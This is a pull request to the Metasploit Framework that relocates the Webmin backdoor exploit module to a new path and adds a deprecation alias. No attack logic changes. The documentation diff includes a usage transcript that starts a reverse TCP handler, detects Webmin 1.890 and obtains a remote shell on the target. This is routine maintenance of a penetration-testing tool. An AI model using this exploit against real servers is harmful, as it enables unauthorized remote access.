### PR TITLE
Move exploit/unix/webapp/webmin_backdoor to linux/http

### DIFF
--- a/documentation/modules/exploit/linux/http/webmin_backdoor.md
+++ b/documentation/modules/exploit/linux/http/webmin_backdoor.md
@@ -78,7 +78,7 @@ Set this to `true` to override the `check` result during exploitation.
 ## Usage
 
 ```
-msf5 exploit(unix/webapp/webmin_backdoor) > run
+msf5 exploit(linux/http/webmin_backdoor) > run
 
 [*] Started reverse TCP handler on 172.28.128.1:4444
 [*] Webmin 1.890 detected
@@ -95,9 +95,9 @@ uname -a
 Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 ^Z
 Background session 1? [y/N]  y
-msf5 exploit(unix/webapp/webmin_backdoor) > set target 1
+msf5 exploit(linux/http/webmin_backdoor) > set target 1
 target => 1
-msf5 exploit(unix/webapp/webmin_backdoor) > run
+msf5 exploit(linux/http/webmin_backdoor) > run
 
 [*] Started reverse TCP handler on 172.28.128.1:4444
 [*] Webmin 1.890 detected

--- a/modules/exploits/linux/http/webmin_backdoor.rb
+++ b/modules/exploits/linux/http/webmin_backdoor.rb
@@ -9,6 +9,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::Module::Deprecated
+
+  moved_from 'exploit/unix/webapp/webmin_backdoor'
 
   def initialize(info = {})
     super(update_info(info,


### PR DESCRIPTION
Fixes #12219. This really should have been in `linux/http`, since it's its own self-contained software, not something you deploy in an Apache root. Now users can access the module under both names.

```
msf5 > use exploit/unix/webapp/webmin_backdoor

[!] *             The module exploit/unix/webapp/webmin_backdoor has been moved!             *
[!] *                    You are using exploit/linux/http/webmin_backdoor                    *
msf5 exploit(unix/webapp/webmin_backdoor) >
```

```
msf5 > use exploit/linux/http/webmin_backdoor
msf5 exploit(linux/http/webmin_backdoor) >
```

No functional change, thanks to the amazing @acammack-r7.